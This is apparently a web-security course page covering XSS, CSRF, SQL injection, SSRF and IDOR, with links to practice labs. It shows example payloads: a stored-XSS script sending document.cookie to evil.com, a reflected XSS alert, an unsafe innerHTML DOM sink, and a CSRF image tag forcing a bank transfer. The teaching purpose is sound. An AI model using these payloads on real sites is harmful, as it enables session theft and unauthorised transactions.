🔐

Security Track

Understand common web vulnerabilities, attack patterns, and defensive techniques. Essential knowledge for building secure applications and testing for weaknesses.

Sections 4

Prerequisites Web basics, HTTP

What You'll Learn

SQL Injection attacks and prevention
Cross-Site Scripting (XSS) variants
CSRF and session-based attacks
SSRF, IDOR, and access control flaws
OWASP standards and frameworks
Hands-on vulnerability testing

Core Vulnerability Types

SQL Injection

Abusing database queries by injecting malicious SQL code through user input.

Cross-Site Scripting (XSS)

Injecting malicious scripts into websites. The core problem is that in HTML/CSS, there's no difference between control (HTML tags) and data (text). Any time an attacker can insert arbitrary data, they can run code in the viewer's browser.

PortSwigger has a good article on XSS

Stored XSS (Persistent XSS)

The malicious payload is saved on the server and delivered to every user who views that data.

Example: Attacker posts a comment with a script tag. Anyone loading the page executes that script.

Nice article! <script>fetch('http://evil.com/steal?c='+document.cookie)</script>

Online example (PortSwigger Lab)

Reflected XSS

The payload is immediately bounced ("reflected") back in the server's response, not stored.

Example:

https://example.com/search?q=<script>alert(1)</script>

Server naively renders: You searched for: <script>alert(1)</script>

Online example

DOM-based XSS (Client-side XSS)

The injection never touches the server. The browser's own JavaScript takes attacker-controlled input and manipulates the DOM unsafely.

<script>
  let query = location.hash.substr(1);
  document.getElementById('q').innerHTML = query;
</script>

Danger: Completely bypasses server-side sanitization.

Cross-Site Request Forgery (CSRF)

CSRF happens when a victim's browser, already authenticated to a site, is tricked into making an unwanted request. The attacker "rides" the victim's session cookies to execute unintended actions.

Classic Web CSRF

Pattern: Exploit implicit trust (cookies, bearer tokens automatically sent).

Victim is logged into bank.com
Attacker sends victim an email with: <img src="https://bank.com/transfer?to=attacker&amount=1000">
Browser auto-attaches session cookies
Bank server sees valid request → money transfers

Other Important Vulnerabilities

Server-Side Request Forgery (SSRF): Forcing a server to make requests on an attacker's behalf
Insecure Direct Object Reference (IDOR): Accessing unauthorized data by manipulating object references (e.g., changing id=123 to id=124)
Remote Code Execution (RCE): The holy grail—running arbitrary commands on a server

OWASP Resources

Standards & Frameworks

Brief through the OWASP 2025 framework (PDF)
OWASP Top 10
OWASP Application Security Verification Standard

Hands-on: Gruyere

Practice Environment

Gruyere is a vulnerable web application for learning security.

Try playing with it and finding vulnerabilities

Install Burp Suite and watch the tutorial

Use Burp Suite to explore Gruyere

Hands-on: Electricity Shop

Internal Vulnerable Application

Electricity Shop is a Tenzai-built vulnerable e-commerce application. Run it locally and find as many vulnerabilities as you can.

← Back to Home Agent Track →